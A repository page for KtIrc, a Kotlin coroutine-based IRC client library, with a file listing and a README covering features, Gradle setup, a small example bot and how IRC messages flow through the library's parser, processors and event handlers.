D. In each office, deploy a management server, a database server, and a publishing server.
Answer: A
QUESTION 79
Your network contains an Active Directory domain named contoso.com. The domain contains 500 client computers that run Windows 8. You plan to deploy two applications named App1 and App2 to the client computers. App2 is updated by the application manufacturer every month. You need to recommend an application distribution strategy for the applications. The solution must meet the following requirements:
The executable files of App1 must NOT be stored on the client computers. Users who run App2 must run the latest version of App2 only. What should you recommend using to deploy the applications?
A. Microsoft Application Virtualization (App-V) in streaming mode
B. A Group Policy software distribution package that is published to the user accounts
C. Windows XP Mode
D. A Group Policy software distribution package that is assigned to the user accounts
Answer: A
QUESTION 80
Your network contains an Active Directory domain named contoso.com. All client computers run Windows 7. You plan to upgrade all of the client computers to Windows 8. You install the Microsoft Application Compatibility Toolkit (ACT) on a server named Server1. You configure Server1 to host the Log Processing Service shared folder, You need to recommend which permissions must be assigned to the Log Processing Service shared folder. The solution must provide the least amount of permissions to the shared folder. Which permissions should you recommend assigning to the Everyone group on the shared folder? (Each correct answer presents part of the solution. Choose all that apply.)
A. Write NTFS permissions
B. Read NTFS permissions
C. Change Share permissions
D. Read NTFS permissions and Execute NTFS permissions
E. Read Share permissions
Answer: ACE
Passing Microsoft 70-416 Exam successfully in a short time! Just using Braindump2go’s Latest Microsoft 70-416 Dump: http://www.braindump2go.com/70-416.html
|
__label__pos
| 0.612248 |
3
$\begingroup$
There are many papers studying branching laws of irreducible admissible complex representations of classical groups over local fields, are there some analogues for $p$-adic representations?
For example, consider an irreducible admissible $p$-adic representation of $GL_2(\mathbb Q_p)$, what are the multiplicities of its restriction to $GL_1(\mathbb Q_p)$ ? How about $GL_n(\mathbb Q_{p^2})$ to $GL_n(\mathbb Q_p)$ ?
More precisely, $p$-adic representations of $G$ mean admissible unitary $L$-Banach representations of $G(\mathbb Q_p)$ where $G$ is a reductive group over $\mathbb Q_p$, and $L$ is a finite extension of $\mathbb Q_p$. They are natural objects in the $p$-adic Langlands program. And we care about dimension of $Hom_H(\pi|_{H}, \sigma)$ as in the classical branching law where $H$ is a reductive subgroup of $G$, and the representations $\pi$ and $\sigma$ are both irreducible.
$\endgroup$
• $\begingroup$ Can you clarify whether you are asking about representations defined over $p$-adic fields or over $\mathbb C$? Paul Broussous' answer assumes the latter, though this falls under the heading of "irreducible admissible complex representations of classical groups over local fields" which you said you knew about. $\endgroup$ – Kimball Oct 25 at 9:23
• $\begingroup$ @Kimball You're right I did not understand the question correctly ... $\endgroup$ – Paul Broussous Oct 25 at 11:31
• $\begingroup$ @PaulBroussous Well, I'm not sure---I find the question a bit vague as the term "$p$-adic representation" is. Also, previous questions of the OP make me wonder which is actually meant. $\endgroup$ – Kimball Oct 25 at 14:29
• $\begingroup$ @Kimball Sorry I shall be more specific, thank you! $\endgroup$ – sawdada Oct 25 at 17:19
2
$\begingroup$
If you're asking about admissible p-adic Banach space representations in the sense of Schneider--Teitelbaum, then I think virtually nothing is known in this setting about branching laws, even in the simplest cases like branching from $GL_2(\mathbb{Q}_p)$ to the diagonal maximal torus (a case which we understand extremely well for smooth representations, thanks to Waldspurger's theorem).
$\endgroup$
• $\begingroup$ Are there any $p$-adic multiplicity 1 results known, like a (non-reductive) analogue of Whittaker models? $\endgroup$ – Kimball Oct 25 at 18:19
• 1
$\begingroup$ Colmez's work on p-adic Langlands uses something he calls a Kirillov model; but I don't know if it has the same uniqueness properties as the Whittaker/Kirillov models in the smooth theory. $\endgroup$ – David Loeffler Oct 26 at 9:13
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.672469 |
Conditions after actions
Hi, does anyone know if it’s possible to add a condition after taking an action? For example: When I set a custom action in a button I am able to add a condition at the beginning, but I am not able to add another condition after an action is taken. Is there a way to do that? Because I need to " make a decision" after the action is taken, not before.
Not yet. We’ve requested it.
1 Like
Just curious, what is your specific use case for this?
1 Like
I need to set a value in a column and based on that value y need to show a success or failure notification.
|
__label__pos
| 0.994082 |
image
import "android.googlesource.com/platform/tools/gpu/image"
Package image provides functions for converting between various image formats.
Usage
func Convert
func Convert(data []byte, width int, height int, srcFmt Format, dstFmt Format) ([]byte, error)
Convert uses the registered Converters to convert the image formed from the parameters data, width and height from srcFmt to dstFmt. If the conversion succeeds then the converted image data is returned, otherwise an error is returned. If no direct converter has been registered to convert from srcFmt to dstFmt, then Convert may try converting via an intermediate format.
func RegisterConverter
func RegisterConverter(src, dst Format, c Converter)
RegisterConverter registers the Converter for converting from src to dst formats. If a converter already exists for converting from src to dst, then this function panics.
type Converter
type Converter func(data []byte, width int, height int) ([]byte, error)
Converter is used to convert the the image formed from the parameters data, width and height into another format. If the conversion succeeds then the converted image data is returned, otherwise an error is returned.
type Format
type Format interface {
Check(data []byte, width, height int) error
}
Format is the interface for an image and/or pixel format.
Check returns an error if the combination of data, image width and image height is invalid for the given format, otherwise Check returns nil.
func ATC_RGBA_EXPLICIT_ALPHA_AMD
func ATC_RGBA_EXPLICIT_ALPHA_AMD() Format
ATC_RGBA_EXPLICIT_ALPHA_AMD returns a format representing the texture compression format with the same name.
func ATC_RGB_AMD
func ATC_RGB_AMD() Format
ATC_RGB_AMD returns a format representing the texture compression format with the same name.
func Alpha
func Alpha() Format
Alpha returns a format containing a single 8-bit alpha channel per pixel.
func ETC1_RGB8_OES
func ETC1_RGB8_OES() Format
ETC1_RGB8_OES returns a format representing the texture compression format with the same name.
func Luminance
func Luminance() Format
Luminance returns a format containing a single 8-bit luminance channel per pixel.
func LuminanceAlpha
func LuminanceAlpha() Format
LuminanceAlpha returns a format containing an 8-bit luminance and alpha channel per pixel.
func PNG
func PNG() Format
PNG returns a format representing the the texture compression format with the same name.
func RGB
func RGB() Format
RGB returns a format containing an 8-bit red, green and blue channel per pixel.
func RGBA
func RGBA() Format
RGBA returns a format containing an 8-bit red, green, blue and alpha channel per pixel.
|
__label__pos
| 0.921138 |
Today (Saturday) We will make some minor tuning adjustments to MySQL.
You may experience 2 up to 10 seconds "glitch time" when we restart MySQL. We expect to make these adjustments around 1AM Eastern Daylight Saving Time (EDT) US.
Linux and UNIX Man Pages
Linux & Unix Commands - Search Man Pages
RedHat 9 (Linux i386) - man page for pkcs12_create (redhat section 3)
PKCS12_create(3) OpenSSL PKCS12_create(3)
NAME
PKCS12_create - create a PKCS#12 structure
SYNOPSIS
#include <openssl/pkcs12.h> PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert, STACK_OF(X509) *ca, int nid_key, int nid_cert, int iter, int mac_iter, int keytype);
DESCRIPTION
PKCS12_create() creates a PKCS#12 structure. pass is the passphrase to use. name is the friendlyName to use for the supplied certifictate and key. pkey is the private key to include in the structure and cert its corresponding certificates. ca, if not NULL is an optional set of certificates to also include in the structure. nid_key and nid_cert are the encryption algorithms that should be used for the key and certificate respectively. iter is the encryption algorithm iteration count to use and mac_iter is the MAC iteration count to use. keytype is the type of key.
NOTES
The parameters nid_key, nid_cert, iter, mac_iter and keytype can all be set to zero and sensible defaults will be used. These defaults are: 40 bit RC2 encryption for certificates, triple DES encryption for private keys, a key iteration count of PKCS12_DEFAULT_ITER (currently 2048) and a MAC iteration count of 1. The default MAC iteration count is 1 in order to retain compatibility with old software which did not interpret MAC iteration counts. If such compatibility is not required then mac_iter should be set to PKCS12_DEFAULT_ITER. keytype adds a flag to the store private key. This is a non standard extension that is only currently interpreted by MSIE. If set to zero the flag is omitted, if set to KEY_SIG the key can be used for signing only, if set to KEY_EX it can be used for signing and encryption. This option was useful for old export grade software which could use signing only keys of arbitrary size but had restrictions on the per- missible sizes of keys which could be used for encryption.
SEE ALSO
d2i_PKCS12(3)
HISTORY
PKCS12_create was added in OpenSSL 0.9.3 0.9.7a 2002-10-09 PKCS12_create(3)
Featured Tech Videos
|
__label__pos
| 0.535138 |
Version: 2.0.40 2.2.26 2.4.37 3.10 3.11 3.12 3.13 3.14 3.15 3.16 3.17 3.18 3.19 4.0 4.1 4.2 4.3 4.4 4.5 4.6 4.7
Linux/sound/soc/codecs/wm8776.c
1 /*
2 * wm8776.c -- WM8776 ALSA SoC Audio driver
3 *
4 * Copyright 2009-12 Wolfson Microelectronics plc
5 *
6 * Author: Mark Brown <[email protected]>
7 *
8 * This program is free software; you can redistribute it and/or modify
9 * it under the terms of the GNU General Public License version 2 as
10 * published by the Free Software Foundation.
11 *
12 * TODO: Input ALC/limiter support
13 */
14
15 #include <linux/module.h>
16 #include <linux/moduleparam.h>
17 #include <linux/init.h>
18 #include <linux/delay.h>
19 #include <linux/pm.h>
20 #include <linux/i2c.h>
21 #include <linux/of_device.h>
22 #include <linux/regmap.h>
23 #include <linux/spi/spi.h>
24 #include <linux/slab.h>
25 #include <sound/core.h>
26 #include <sound/pcm.h>
27 #include <sound/pcm_params.h>
28 #include <sound/soc.h>
29 #include <sound/initval.h>
30 #include <sound/tlv.h>
31
32 #include "wm8776.h"
33
34 enum wm8776_chip_type {
35 WM8775 = 1,
36 WM8776,
37 };
38
39 /* codec private data */
40 struct wm8776_priv {
41 struct regmap *regmap;
42 int sysclk[2];
43 };
44
45 static const struct reg_default wm8776_reg_defaults[] = {
46 { 0, 0x79 },
47 { 1, 0x79 },
48 { 2, 0x79 },
49 { 3, 0xff },
50 { 4, 0xff },
51 { 5, 0xff },
52 { 6, 0x00 },
53 { 7, 0x90 },
54 { 8, 0x00 },
55 { 9, 0x00 },
56 { 10, 0x22 },
57 { 11, 0x22 },
58 { 12, 0x22 },
59 { 13, 0x08 },
60 { 14, 0xcf },
61 { 15, 0xcf },
62 { 16, 0x7b },
63 { 17, 0x00 },
64 { 18, 0x32 },
65 { 19, 0x00 },
66 { 20, 0xa6 },
67 { 21, 0x01 },
68 { 22, 0x01 },
69 };
70
71 static bool wm8776_volatile(struct device *dev, unsigned int reg)
72 {
73 switch (reg) {
74 case WM8776_RESET:
75 return true;
76 default:
77 return false;
78 }
79 }
80
81 static int wm8776_reset(struct snd_soc_codec *codec)
82 {
83 return snd_soc_write(codec, WM8776_RESET, 0);
84 }
85
86 static const DECLARE_TLV_DB_SCALE(hp_tlv, -12100, 100, 1);
87 static const DECLARE_TLV_DB_SCALE(dac_tlv, -12750, 50, 1);
88 static const DECLARE_TLV_DB_SCALE(adc_tlv, -10350, 50, 1);
89
90 static const struct snd_kcontrol_new wm8776_snd_controls[] = {
91 SOC_DOUBLE_R_TLV("Headphone Playback Volume", WM8776_HPLVOL, WM8776_HPRVOL,
92 0, 127, 0, hp_tlv),
93 SOC_DOUBLE_R_TLV("Digital Playback Volume", WM8776_DACLVOL, WM8776_DACRVOL,
94 0, 255, 0, dac_tlv),
95 SOC_SINGLE("Digital Playback ZC Switch", WM8776_DACCTRL1, 0, 1, 0),
96
97 SOC_SINGLE("Deemphasis Switch", WM8776_DACCTRL2, 0, 1, 0),
98
99 SOC_DOUBLE_R_TLV("Capture Volume", WM8776_ADCLVOL, WM8776_ADCRVOL,
100 0, 255, 0, adc_tlv),
101 SOC_DOUBLE("Capture Switch", WM8776_ADCMUX, 7, 6, 1, 1),
102 SOC_DOUBLE_R("Capture ZC Switch", WM8776_ADCLVOL, WM8776_ADCRVOL, 8, 1, 0),
103 SOC_SINGLE("Capture HPF Switch", WM8776_ADCIFCTRL, 8, 1, 1),
104 };
105
106 static const struct snd_kcontrol_new inmix_controls[] = {
107 SOC_DAPM_SINGLE("AIN1 Switch", WM8776_ADCMUX, 0, 1, 0),
108 SOC_DAPM_SINGLE("AIN2 Switch", WM8776_ADCMUX, 1, 1, 0),
109 SOC_DAPM_SINGLE("AIN3 Switch", WM8776_ADCMUX, 2, 1, 0),
110 SOC_DAPM_SINGLE("AIN4 Switch", WM8776_ADCMUX, 3, 1, 0),
111 SOC_DAPM_SINGLE("AIN5 Switch", WM8776_ADCMUX, 4, 1, 0),
112 };
113
114 static const struct snd_kcontrol_new outmix_controls[] = {
115 SOC_DAPM_SINGLE("DAC Switch", WM8776_OUTMUX, 0, 1, 0),
116 SOC_DAPM_SINGLE("AUX Switch", WM8776_OUTMUX, 1, 1, 0),
117 SOC_DAPM_SINGLE("Bypass Switch", WM8776_OUTMUX, 2, 1, 0),
118 };
119
120 static const struct snd_soc_dapm_widget wm8776_dapm_widgets[] = {
121 SND_SOC_DAPM_INPUT("AUX"),
122
123 SND_SOC_DAPM_INPUT("AIN1"),
124 SND_SOC_DAPM_INPUT("AIN2"),
125 SND_SOC_DAPM_INPUT("AIN3"),
126 SND_SOC_DAPM_INPUT("AIN4"),
127 SND_SOC_DAPM_INPUT("AIN5"),
128
129 SND_SOC_DAPM_MIXER("Input Mixer", WM8776_PWRDOWN, 6, 1,
130 inmix_controls, ARRAY_SIZE(inmix_controls)),
131
132 SND_SOC_DAPM_ADC("ADC", "Capture", WM8776_PWRDOWN, 1, 1),
133 SND_SOC_DAPM_DAC("DAC", "Playback", WM8776_PWRDOWN, 2, 1),
134
135 SND_SOC_DAPM_MIXER("Output Mixer", SND_SOC_NOPM, 0, 0,
136 outmix_controls, ARRAY_SIZE(outmix_controls)),
137
138 SND_SOC_DAPM_PGA("Headphone PGA", WM8776_PWRDOWN, 3, 1, NULL, 0),
139
140 SND_SOC_DAPM_OUTPUT("VOUT"),
141
142 SND_SOC_DAPM_OUTPUT("HPOUTL"),
143 SND_SOC_DAPM_OUTPUT("HPOUTR"),
144 };
145
146 static const struct snd_soc_dapm_route routes[] = {
147 { "Input Mixer", "AIN1 Switch", "AIN1" },
148 { "Input Mixer", "AIN2 Switch", "AIN2" },
149 { "Input Mixer", "AIN3 Switch", "AIN3" },
150 { "Input Mixer", "AIN4 Switch", "AIN4" },
151 { "Input Mixer", "AIN5 Switch", "AIN5" },
152
153 { "ADC", NULL, "Input Mixer" },
154
155 { "Output Mixer", "DAC Switch", "DAC" },
156 { "Output Mixer", "AUX Switch", "AUX" },
157 { "Output Mixer", "Bypass Switch", "Input Mixer" },
158
159 { "VOUT", NULL, "Output Mixer" },
160
161 { "Headphone PGA", NULL, "Output Mixer" },
162
163 { "HPOUTL", NULL, "Headphone PGA" },
164 { "HPOUTR", NULL, "Headphone PGA" },
165 };
166
167 static int wm8776_set_fmt(struct snd_soc_dai *dai, unsigned int fmt)
168 {
169 struct snd_soc_codec *codec = dai->codec;
170 int reg, iface, master;
171
172 switch (dai->driver->id) {
173 case WM8776_DAI_DAC:
174 reg = WM8776_DACIFCTRL;
175 master = 0x80;
176 break;
177 case WM8776_DAI_ADC:
178 reg = WM8776_ADCIFCTRL;
179 master = 0x100;
180 break;
181 default:
182 return -EINVAL;
183 }
184
185 iface = 0;
186
187 switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) {
188 case SND_SOC_DAIFMT_CBM_CFM:
189 break;
190 case SND_SOC_DAIFMT_CBS_CFS:
191 master = 0;
192 break;
193 default:
194 return -EINVAL;
195 }
196
197 switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
198 case SND_SOC_DAIFMT_I2S:
199 iface |= 0x0002;
200 break;
201 case SND_SOC_DAIFMT_RIGHT_J:
202 break;
203 case SND_SOC_DAIFMT_LEFT_J:
204 iface |= 0x0001;
205 break;
206 default:
207 return -EINVAL;
208 }
209
210 switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
211 case SND_SOC_DAIFMT_NB_NF:
212 break;
213 case SND_SOC_DAIFMT_IB_IF:
214 iface |= 0x00c;
215 break;
216 case SND_SOC_DAIFMT_IB_NF:
217 iface |= 0x008;
218 break;
219 case SND_SOC_DAIFMT_NB_IF:
220 iface |= 0x004;
221 break;
222 default:
223 return -EINVAL;
224 }
225
226 /* Finally, write out the values */
227 snd_soc_update_bits(codec, reg, 0xf, iface);
228 snd_soc_update_bits(codec, WM8776_MSTRCTRL, 0x180, master);
229
230 return 0;
231 }
232
233 static int mclk_ratios[] = {
234 128,
235 192,
236 256,
237 384,
238 512,
239 768,
240 };
241
242 static int wm8776_hw_params(struct snd_pcm_substream *substream,
243 struct snd_pcm_hw_params *params,
244 struct snd_soc_dai *dai)
245 {
246 struct snd_soc_codec *codec = dai->codec;
247 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
248 int iface_reg, iface;
249 int ratio_shift, master;
250 int i;
251
252 switch (dai->driver->id) {
253 case WM8776_DAI_DAC:
254 iface_reg = WM8776_DACIFCTRL;
255 master = 0x80;
256 ratio_shift = 4;
257 break;
258 case WM8776_DAI_ADC:
259 iface_reg = WM8776_ADCIFCTRL;
260 master = 0x100;
261 ratio_shift = 0;
262 break;
263 default:
264 return -EINVAL;
265 }
266
267 /* Set word length */
268 switch (params_width(params)) {
269 case 16:
270 iface = 0;
271 break;
272 case 20:
273 iface = 0x10;
274 break;
275 case 24:
276 iface = 0x20;
277 break;
278 case 32:
279 iface = 0x30;
280 break;
281 default:
282 dev_err(codec->dev, "Unsupported sample size: %i\n",
283 params_width(params));
284 return -EINVAL;
285 }
286
287 /* Only need to set MCLK/LRCLK ratio if we're master */
288 if (snd_soc_read(codec, WM8776_MSTRCTRL) & master) {
289 for (i = 0; i < ARRAY_SIZE(mclk_ratios); i++) {
290 if (wm8776->sysclk[dai->driver->id] / params_rate(params)
291 == mclk_ratios[i])
292 break;
293 }
294
295 if (i == ARRAY_SIZE(mclk_ratios)) {
296 dev_err(codec->dev,
297 "Unable to configure MCLK ratio %d/%d\n",
298 wm8776->sysclk[dai->driver->id], params_rate(params));
299 return -EINVAL;
300 }
301
302 dev_dbg(codec->dev, "MCLK is %dfs\n", mclk_ratios[i]);
303
304 snd_soc_update_bits(codec, WM8776_MSTRCTRL,
305 0x7 << ratio_shift, i << ratio_shift);
306 } else {
307 dev_dbg(codec->dev, "DAI in slave mode\n");
308 }
309
310 snd_soc_update_bits(codec, iface_reg, 0x30, iface);
311
312 return 0;
313 }
314
315 static int wm8776_mute(struct snd_soc_dai *dai, int mute)
316 {
317 struct snd_soc_codec *codec = dai->codec;
318
319 return snd_soc_write(codec, WM8776_DACMUTE, !!mute);
320 }
321
322 static int wm8776_set_sysclk(struct snd_soc_dai *dai,
323 int clk_id, unsigned int freq, int dir)
324 {
325 struct snd_soc_codec *codec = dai->codec;
326 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
327
328 if (WARN_ON(dai->driver->id >= ARRAY_SIZE(wm8776->sysclk)))
329 return -EINVAL;
330
331 wm8776->sysclk[dai->driver->id] = freq;
332
333 return 0;
334 }
335
336 static int wm8776_set_bias_level(struct snd_soc_codec *codec,
337 enum snd_soc_bias_level level)
338 {
339 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
340
341 switch (level) {
342 case SND_SOC_BIAS_ON:
343 break;
344 case SND_SOC_BIAS_PREPARE:
345 break;
346 case SND_SOC_BIAS_STANDBY:
347 if (snd_soc_codec_get_bias_level(codec) == SND_SOC_BIAS_OFF) {
348 regcache_sync(wm8776->regmap);
349
350 /* Disable the global powerdown; DAPM does the rest */
351 snd_soc_update_bits(codec, WM8776_PWRDOWN, 1, 0);
352 }
353
354 break;
355 case SND_SOC_BIAS_OFF:
356 snd_soc_update_bits(codec, WM8776_PWRDOWN, 1, 1);
357 break;
358 }
359
360 return 0;
361 }
362
363 #define WM8776_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S20_3LE |\
364 SNDRV_PCM_FMTBIT_S24_LE | SNDRV_PCM_FMTBIT_S32_LE)
365
366 static const struct snd_soc_dai_ops wm8776_dac_ops = {
367 .digital_mute = wm8776_mute,
368 .hw_params = wm8776_hw_params,
369 .set_fmt = wm8776_set_fmt,
370 .set_sysclk = wm8776_set_sysclk,
371 };
372
373 static const struct snd_soc_dai_ops wm8776_adc_ops = {
374 .hw_params = wm8776_hw_params,
375 .set_fmt = wm8776_set_fmt,
376 .set_sysclk = wm8776_set_sysclk,
377 };
378
379 static struct snd_soc_dai_driver wm8776_dai[] = {
380 {
381 .name = "wm8776-hifi-playback",
382 .id = WM8776_DAI_DAC,
383 .playback = {
384 .stream_name = "Playback",
385 .channels_min = 2,
386 .channels_max = 2,
387 .rates = SNDRV_PCM_RATE_CONTINUOUS,
388 .rate_min = 32000,
389 .rate_max = 192000,
390 .formats = WM8776_FORMATS,
391 },
392 .ops = &wm8776_dac_ops,
393 },
394 {
395 .name = "wm8776-hifi-capture",
396 .id = WM8776_DAI_ADC,
397 .capture = {
398 .stream_name = "Capture",
399 .channels_min = 2,
400 .channels_max = 2,
401 .rates = SNDRV_PCM_RATE_CONTINUOUS,
402 .rate_min = 32000,
403 .rate_max = 96000,
404 .formats = WM8776_FORMATS,
405 },
406 .ops = &wm8776_adc_ops,
407 },
408 };
409
410 static int wm8776_probe(struct snd_soc_codec *codec)
411 {
412 int ret = 0;
413
414 ret = wm8776_reset(codec);
415 if (ret < 0) {
416 dev_err(codec->dev, "Failed to issue reset: %d\n", ret);
417 return ret;
418 }
419
420 /* Latch the update bits; right channel only since we always
421 * update both. */
422 snd_soc_update_bits(codec, WM8776_HPRVOL, 0x100, 0x100);
423 snd_soc_update_bits(codec, WM8776_DACRVOL, 0x100, 0x100);
424
425 return ret;
426 }
427
428 static struct snd_soc_codec_driver soc_codec_dev_wm8776 = {
429 .probe = wm8776_probe,
430 .set_bias_level = wm8776_set_bias_level,
431 .suspend_bias_off = true,
432
433 .controls = wm8776_snd_controls,
434 .num_controls = ARRAY_SIZE(wm8776_snd_controls),
435 .dapm_widgets = wm8776_dapm_widgets,
436 .num_dapm_widgets = ARRAY_SIZE(wm8776_dapm_widgets),
437 .dapm_routes = routes,
438 .num_dapm_routes = ARRAY_SIZE(routes),
439 };
440
441 static const struct of_device_id wm8776_of_match[] = {
442 { .compatible = "wlf,wm8776", },
443 { }
444 };
445 MODULE_DEVICE_TABLE(of, wm8776_of_match);
446
447 static const struct regmap_config wm8776_regmap = {
448 .reg_bits = 7,
449 .val_bits = 9,
450 .max_register = WM8776_RESET,
451
452 .reg_defaults = wm8776_reg_defaults,
453 .num_reg_defaults = ARRAY_SIZE(wm8776_reg_defaults),
454 .cache_type = REGCACHE_RBTREE,
455
456 .volatile_reg = wm8776_volatile,
457 };
458
459 #if defined(CONFIG_SPI_MASTER)
460 static int wm8776_spi_probe(struct spi_device *spi)
461 {
462 struct wm8776_priv *wm8776;
463 int ret;
464
465 wm8776 = devm_kzalloc(&spi->dev, sizeof(struct wm8776_priv),
466 GFP_KERNEL);
467 if (wm8776 == NULL)
468 return -ENOMEM;
469
470 wm8776->regmap = devm_regmap_init_spi(spi, &wm8776_regmap);
471 if (IS_ERR(wm8776->regmap))
472 return PTR_ERR(wm8776->regmap);
473
474 spi_set_drvdata(spi, wm8776);
475
476 ret = snd_soc_register_codec(&spi->dev,
477 &soc_codec_dev_wm8776, wm8776_dai, ARRAY_SIZE(wm8776_dai));
478
479 return ret;
480 }
481
482 static int wm8776_spi_remove(struct spi_device *spi)
483 {
484 snd_soc_unregister_codec(&spi->dev);
485 return 0;
486 }
487
488 static struct spi_driver wm8776_spi_driver = {
489 .driver = {
490 .name = "wm8776",
491 .of_match_table = wm8776_of_match,
492 },
493 .probe = wm8776_spi_probe,
494 .remove = wm8776_spi_remove,
495 };
496 #endif /* CONFIG_SPI_MASTER */
497
498 #if IS_ENABLED(CONFIG_I2C)
499 static int wm8776_i2c_probe(struct i2c_client *i2c,
500 const struct i2c_device_id *id)
501 {
502 struct wm8776_priv *wm8776;
503 int ret;
504
505 wm8776 = devm_kzalloc(&i2c->dev, sizeof(struct wm8776_priv),
506 GFP_KERNEL);
507 if (wm8776 == NULL)
508 return -ENOMEM;
509
510 wm8776->regmap = devm_regmap_init_i2c(i2c, &wm8776_regmap);
511 if (IS_ERR(wm8776->regmap))
512 return PTR_ERR(wm8776->regmap);
513
514 i2c_set_clientdata(i2c, wm8776);
515
516 ret = snd_soc_register_codec(&i2c->dev,
517 &soc_codec_dev_wm8776, wm8776_dai, ARRAY_SIZE(wm8776_dai));
518
519 return ret;
520 }
521
522 static int wm8776_i2c_remove(struct i2c_client *client)
523 {
524 snd_soc_unregister_codec(&client->dev);
525 return 0;
526 }
527
528 static const struct i2c_device_id wm8776_i2c_id[] = {
529 { "wm8775", WM8775 },
530 { "wm8776", WM8776 },
531 { }
532 };
533 MODULE_DEVICE_TABLE(i2c, wm8776_i2c_id);
534
535 static struct i2c_driver wm8776_i2c_driver = {
536 .driver = {
537 .name = "wm8776",
538 .of_match_table = wm8776_of_match,
539 },
540 .probe = wm8776_i2c_probe,
541 .remove = wm8776_i2c_remove,
542 .id_table = wm8776_i2c_id,
543 };
544 #endif
545
546 static int __init wm8776_modinit(void)
547 {
548 int ret = 0;
549 #if IS_ENABLED(CONFIG_I2C)
550 ret = i2c_add_driver(&wm8776_i2c_driver);
551 if (ret != 0) {
552 printk(KERN_ERR "Failed to register wm8776 I2C driver: %d\n",
553 ret);
554 }
555 #endif
556 #if defined(CONFIG_SPI_MASTER)
557 ret = spi_register_driver(&wm8776_spi_driver);
558 if (ret != 0) {
559 printk(KERN_ERR "Failed to register wm8776 SPI driver: %d\n",
560 ret);
561 }
562 #endif
563 return ret;
564 }
565 module_init(wm8776_modinit);
566
567 static void __exit wm8776_exit(void)
568 {
569 #if IS_ENABLED(CONFIG_I2C)
570 i2c_del_driver(&wm8776_i2c_driver);
571 #endif
572 #if defined(CONFIG_SPI_MASTER)
573 spi_unregister_driver(&wm8776_spi_driver);
574 #endif
575 }
576 module_exit(wm8776_exit);
577
578 MODULE_DESCRIPTION("ASoC WM8776 driver");
579 MODULE_AUTHOR("Mark Brown <[email protected]>");
580 MODULE_LICENSE("GPL");
581
This page was automatically generated by LXR 0.3.1 (source). • Linux is a registered trademark of Linus Torvalds • Contact us
|
__label__pos
| 0.998624 |
Share
## https://sploitus.com/exploit?id=PACKETSTORM:162766
# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64
#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)
buffer = 'Ñ' * 100000
try:
file = open("Lambda.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
|
__label__pos
| 0.534904 |
¿Que es el "d2dpmcommunicator.dll" ?
Nuestra Base de Datos contiene 8 archivos diferentes para el nombre d2dpmcommunicator.dll . You can also check most distributed file variants with name d2dpmcommunicator.dll. Estos archivos pertenecen frecuentemente al producto CA ARCserve D2D y fueron desarrollados frecuentemente por la compañia CA. Estos archivos tienen frecuentemente descripción CA ARCserve D2D. Este archivo es una Librería de enlace Dinámico. Esta librería puede ser cargada y ejecutada en cualquier proceso en ejecución.
d2dpmcommunicator.dll Librería
Detalles de los archivos mas usados con el nombre "d2dpmcommunicator.dll"
Producto:
CA ARCserve D2D
Compañía:
CA
Descripción:
CA ARCserve D2D
Versión:
16.0.1174.3
MD5:
8348372172aaa1f20feca246e3ca152d
SHA1:
e9a93f4a87697549cb45abdceb1e6fa0abcfe5a2
SHA256:
b10d70806d4ff81625b5e6159495a90b022c5ee92204eb0a0e6c8496610d04db
Tamaño:
19784
Directorio:
%PROGFILES64%\CA\ARCserve D2D\Update Manager
Sistema Operativo:
Windows 7
Ocurrencia:
Bajo oc0
Firma digital:
CA
¿Es la librería "d2dpmcommunicator.dll" Seguro o Amenaza ?
Última nueva variante del archivo de nombre "d2dpmcommunicator.dll" fue descubierta 2314 días atrás. Nuestra base de datos contiene 1 variantes del archivo "d2dpmcommunicator.dll" con calificación final Seguro y cero variantes con calificación final Amenaza . Calificaciones finales están basadas en revisiones, fecha de descubrimiento, ocurrencia de usuarios y resultado de antivirus.
ScanLibrería con nombre de archivo "d2dpmcommunicator.dll" pueden ser Seguro o Amenaza. Debe definir mas atributos del archivo para determinar la calificación correcta. Nuestra premiada herramienta libre provee el mas simple modo de verificar sus archivos via nuestra base de datos. La herramienta contiene muchas funciones útiles para mantener su sistema bajo control y usa un mínimo de recursos del sistema.
Clic aquí para descargar gratis System Explorer.
Revisión para "d2dpmcommunicator.dll"
Todavía no tenemos revisiones de usuarios para archivos con el nombre "d2dpmcommunicator.dll".
|
__label__pos
| 0.697069 |
Ethernet Private Line (EPL) is a dedicated, point-to-point Ethernet service that provides a high-speed and secure connection between two specific locations. EPL is often used by businesses and organizations to establish a private and reliable network link between two geographically separate sites. It offers several key features and benefits that make it a popular choice for point-to-point connectivity.
Key Features of Ethernet Private Line (EPL):
1. Dedicated Connection: EPL provides a dedicated and exclusive Ethernet connection between the two endpoints, ensuring that bandwidth is not shared with other users or applications.
2. Guaranteed Bandwidth: EPL services offer guaranteed and symmetrical bandwidth, meaning that the same amount of bandwidth is available for both upstream and downstream traffic. This predictability is crucial for applications that require consistent performance.
3. Low Latency: EPL connections typically have low latency, making them suitable for real-time applications such as voice and video conferencing, as well as data replication and backup.
4. High Reliability: EPL services are known for their reliability and uptime, making them ideal for mission-critical applications and data transfer between key locations.
5. Scalability: EPL services can often be easily scaled to accommodate changing bandwidth requirements, allowing businesses to adapt to evolving network needs.
6. Secure Communication: EPL connections are inherently secure, as the data transmitted over the dedicated link is not exposed to external traffic or potential eavesdropping.
7. Simple Management: EPL services are typically straightforward to manage, with easy configuration and monitoring options for network administrators.
Use Cases for Ethernet Private Line (EPL):
1. Connecting Offices: EPL is commonly used to connect multiple office locations, ensuring fast and secure data transfer between headquarters, branch offices, or remote sites.
